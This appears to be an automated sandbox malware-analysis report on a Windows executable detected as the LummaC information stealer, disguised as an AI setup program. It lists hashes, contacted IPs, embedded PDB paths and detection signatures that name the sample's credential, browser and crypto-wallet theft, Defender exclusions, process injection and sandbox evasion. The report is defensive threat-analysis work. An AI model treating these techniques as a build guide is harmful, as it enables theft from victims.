Windows Analysis Report
mDHwap5GlV.exe

Overview

General Information

Sample name: mDHwap5GlV.exe
renamed because original name is a hash value
Original sample name: 1055064ac9b506a5b74090f71c4fabbe4bf077bce9bd80bfce9671e723f50cfc.exe
Analysis ID: 1561835
MD5: ff8c1b17f334e2a1ef11429bbca0351f
SHA1: 1881b5d505c081056241368e37edb69be16a6eae
SHA256: 1055064ac9b506a5b74090f71c4fabbe4bf077bce9bd80bfce9671e723f50cfc
Tags: exeNineRiversSkyRoarCommitTradeCoLtduser-JAMESWT_MHT
Infos:

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to prevent local Windows debugging
Found many strings related to Crypto-Wallets (likely being stolen)
Hijacks the control flow in another process
Injects a PE file into a foreign processes
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Potentially malicious time measurement code found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

AV Detection
barindex
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Uses 32bit PE files
Source: mDHwap5GlV.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: mDHwap5GlV.exe Static PE information: certificate valid
Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.178.191:443 -> 192.168.2.4:49924 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.178.191:443 -> 192.168.2.4:49930 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.178.191:443 -> 192.168.2.4:49937 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.178.191:443 -> 192.168.2.4:49943 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.178.191:443 -> 192.168.2.4:49949 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.178.191:443 -> 192.168.2.4:49956 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.178.191:443 -> 192.168.2.4:49962 version: TLS 1.2
Source: mDHwap5GlV.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq.Expressions\Release\net7.0\System.Linq.Expressions.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2586676294.000000000A3E1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Sockets.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2610536524.000000000E271000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdb source: mDHwap5GlV.exe, 00000000.00000002.2583710420.0000000009BA0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net7.0\System.Linq.pdbSHA256#0$B source: mDHwap5GlV.exe, 00000000.00000002.2587665887.000000000A930000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2587777590.000000000A9B1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net7.0\System.Net.ServicePoint.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net7.0-windows\System.Net.NameResolution.pdbSHA256A source: mDHwap5GlV.exe, 00000000.00000002.2612038536.000000000E351000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2611890775.000000000E320000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: mDHwap5GlV.exe
Source: Binary string: wntdll.pdb source: decrypted_app_1.exe, 00000007.00000002.3101125278.00000000030E0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/Microsoft.VisualBasic/Release/net7.0-windows/Microsoft.VisualBasic.pdbSHA2565 source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Quic\Release\net7.0-windows\System.Net.Quic.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607352936.000000000DCF0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607441531.000000000DD41000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net7.0\System.Collections.Concurrent.pdbSHA256 source: mDHwap5GlV.exe
Source: Binary string: System.Net.Security.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593612711.000000000C991000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593507496.000000000C900000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net7.0-windows/System.Management.pdb source: mDHwap5GlV.exe, 00000000.00000002.2609096644.000000000DEF0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/Microsoft.VisualBasic/Release/net7.0-windows/Microsoft.VisualBasic.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net7.0\System.Diagnostics.DiagnosticSource.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593385471.000000000C8A1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdba source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593385471.000000000C8A1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.CodeDom/Release/net7.0/System.CodeDom.pdb source: mDHwap5GlV.exe, 00000000.00000002.2609096644.000000000DEF0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Buffers\Release\net7.0\System.Buffers.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x86\Release\System.Private.CoreLib.pdb source: mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\DayDerry\Pro_AI_setup_v_1.03\obj\Release\net7.0\win-x86\Pro_AI_setup_v_1.03.pdbSHA256 source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\dlls\mscordac\mscordaccore.pdb source: mDHwap5GlV.exe
Source: Binary string: System.Linq.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2587665887.000000000A930000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2587777590.000000000A9B1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices.RuntimeInformation\Release\net7.0\System.Runtime.InteropServices.RuntimeInformation.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2604580772.000000000D410000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net7.0\System.Memory.pdbSHA256oY source: mDHwap5GlV.exe, 00000000.00000002.2604929693.000000000D481000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604788493.000000000D440000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Immutable\Release\net7.0\System.Collections.Immutable.pdb source: mDHwap5GlV.exe
Source: Binary string: System.Collections.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2605844050.000000000D521000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2605777963.000000000D4D0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net7.0\System.Threading.Thread.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2607545242.000000000DD80000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2609058208.000000000DEE0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb>i source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net7.0-windows\System.Diagnostics.Process.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607643100.000000000DDB0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607711334.000000000DE01000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2620268309.000000000E7F0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2620375104.000000000E811000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Data/Release/net7.0-windows/System.Data.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Contracts\Release\net7.0\System.Diagnostics.Contracts.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Timer\Release\net7.0\System.Threading.Timer.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net7.0\System.Collections.pdb source: mDHwap5GlV.exe, 00000000.00000002.2605844050.000000000D521000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2605777963.000000000D4D0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Data/Release/net7.0-windows/System.Data.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO\Release\net7.0\System.IO.pdb source: mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO\Release\net7.0\System.IO.pdbSHA256w source: mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Configuration/Release/net7.0-windows/System.Configuration.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2585865823.0000000009D10000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: wntdll.pdbUGP source: decrypted_app_1.exe, 00000007.00000002.3101125278.00000000030E0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Debug\Release\net7.0\System.Diagnostics.Debug.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net7.0\System.Threading.Overlapped.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2611810679.000000000E300000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.UnmanagedMemoryStream\Release\net7.0\System.IO.UnmanagedMemoryStream.pdb source: mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Collections.Immutable.ni.pdb source: mDHwap5GlV.exe
Source: Binary string: C:\Users\Administrator\Desktop\DayDerry\Pro_AI_setup_v_1.03\obj\Release\net7.0\win-x86\Pro_AI_setup_v_1.03.pdb source: mDHwap5GlV.exe
Source: Binary string: System.Net.NameResolution.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2612038536.000000000E351000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2611890775.000000000E320000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net7.0\System.Collections.Specialized.pdb source: mDHwap5GlV.exe, 00000000.00000002.2620268309.000000000E7F0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2620375104.000000000E811000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net7.0\System.Runtime.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2582770722.0000000009AB0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.VisualBasic.Core\Release\net7.0-windows\Microsoft.VisualBasic.Core.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Quic\Release\net7.0-windows\System.Net.Quic.pdbSHA256: source: mDHwap5GlV.exe, 00000000.00000002.2607352936.000000000DCF0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607441531.000000000DD41000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net7.0\System.Diagnostics.Tracing.pdb source: mDHwap5GlV.exe, 00000000.00000002.2592357978.000000000C7E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net7.0\System.Runtime.InteropServices.pdb source: mDHwap5GlV.exe, 00000000.00000002.2604580772.000000000D410000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604677499.000000000D431000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb[ source: mDHwap5GlV.exe, 00000000.00000002.2579250660.0000000008DC1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2577048094.0000000008330000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Quic.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607352936.000000000DCF0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607441531.000000000DD41000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net7.0\System.Threading.pdb source: mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595974127.000000000D041000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593385471.000000000C8A1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Timer\Release\net7.0\System.Threading.Timer.pdb source: mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Threading.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595974127.000000000D041000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.AppContext\Release\net7.0\System.AppContext.pdbSHA256 source: mDHwap5GlV.exe
Source: Binary string: System.Net.ServicePoint.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.CSharp\Release\net7.0-windows\Microsoft.CSharp.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.Primitives\Release\net7.0\System.Security.Cryptography.Primitives.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net7.0\System.Collections.Concurrent.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.Primitives\Release\net7.0\System.Security.Cryptography.Primitives.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net7.0\System.Memory.pdb source: mDHwap5GlV.exe, 00000000.00000002.2604929693.000000000D481000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604788493.000000000D440000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net7.0-windows\System.Net.NameResolution.pdb source: mDHwap5GlV.exe, 00000000.00000002.2612038536.000000000E351000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2611890775.000000000E320000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net7.0\System.Diagnostics.Tracing.pdbSHA256q source: mDHwap5GlV.exe, 00000000.00000002.2592357978.000000000C7E0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net7.0-windows\System.Security.Cryptography.pdb source: mDHwap5GlV.exe, 00000000.00000002.2594220011.000000000CBE1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: Microsoft.CSharp.ni.pdb source: mDHwap5GlV.exe
Source: Binary string: System.Collections.ni.pdb; lr source: mDHwap5GlV.exe, 00000000.00000002.2605844050.000000000D521000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2605777963.000000000D4D0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Collections.Concurrent.ni.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net7.0\System.Runtime.pdb source: mDHwap5GlV.exe, 00000000.00000002.2582770722.0000000009AB0000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Sockets.ni.pdbp source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2610536524.000000000E271000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607643100.000000000DDB0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607711334.000000000DE01000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net7.0-windows\System.Console.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2585865823.0000000009D10000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2583359508.0000000009AD1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Private.Uri.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2594641559.000000000CDAA000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2594814056.000000000CDF1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.AppContext\Release\net7.0\System.AppContext.pdb source: mDHwap5GlV.exe
Source: Binary string: Microsoft.VisualBasic.Core.ni.pdb source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net7.0\System.Diagnostics.DiagnosticSource.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593385471.000000000C8A1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net7.0\System.Threading.ThreadPool.pdb source: mDHwap5GlV.exe, 00000000.00000002.2607545242.000000000DD80000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2595889586.000000000D010000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net7.0\Microsoft.Win32.Primitives.pdbSHA256 source: mDHwap5GlV.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net7.0-windows\System.Net.Security.pdbSHA256S source: mDHwap5GlV.exe, 00000000.00000002.2593612711.000000000C991000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593507496.000000000C900000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net7.0\System.Private.Uri.pdb source: mDHwap5GlV.exe, 00000000.00000002.2594641559.000000000CDAA000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2594814056.000000000CDF1000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: System.Linq.Expressions.ni.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2586676294.000000000A3E1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net7.0-windows\System.Net.Sockets.pdb source: mDHwap5GlV.exe, 00000000.00000002.2610251919.000000000E1E0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2610536524.000000000E271000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.UnmanagedMemoryStream\Release\net7.0\System.IO.UnmanagedMemoryStream.pdbSHA256 source: mDHwap5GlV.exe, 00000000.00000002.2586356950.000000000A070000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: /_/artifacts/obj/System.Configuration/Release/net7.0-windows/System.Configuration.pdb source: mDHwap5GlV.exe, 00000000.00000002.2585865823.0000000009D10000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net7.0-windows\System.Net.Security.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593612711.000000000C991000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593507496.000000000C900000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Memory.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2604929693.000000000D481000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604788493.000000000D440000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Net.Quic.ni.pdb,3 source: mDHwap5GlV.exe, 00000000.00000002.2607352936.000000000DCF0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607441531.000000000DD41000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net7.0\System.Text.Encoding.Extensions.pdb source: mDHwap5GlV.exe, 00000000.00000002.2608346084.000000000DE60000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net7.0\System.Threading.Overlapped.pdb source: mDHwap5GlV.exe, 00000000.00000002.2611810679.000000000E300000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\Corehost.Static\singlefilehost.pdb source: mDHwap5GlV.exe
Source: Binary string: System.Security.Cryptography.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2594220011.000000000CBE1000.00000020.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Contracts\Release\net7.0\System.Diagnostics.Contracts.pdbSHA256_O source: mDHwap5GlV.exe, 00000000.00000002.2593292915.000000000C830000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb]:K source: mDHwap5GlV.exe, 00000000.00000002.2607643100.000000000DDB0000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2607711334.000000000DE01000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net7.0-windows\System.Net.Primitives.pdb source: mDHwap5GlV.exe, mDHwap5GlV.exe, 00000000.00000002.2583501518.0000000009B20000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2583583075.0000000009B61000.00000020.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices.RuntimeInformation\Release\net7.0\System.Runtime.InteropServices.RuntimeInformation.pdb source: mDHwap5GlV.exe, 00000000.00000002.2604580772.000000000D410000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\Release\net7.0\System.Security.Cryptography.X509Certificates.pdb source: mDHwap5GlV.exe, 00000000.00000002.2593821344.000000000CA20000.00000002.00000001.00040000.00000003.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: mDHwap5GlV.exe, 00000000.00000002.2604580772.000000000D410000.00000002.00000001.00040000.00000003.sdmp, mDHwap5GlV.exe, 00000000.00000002.2604677499.000000000D431000.00000020.00000001.00040000.00000003.sdmp
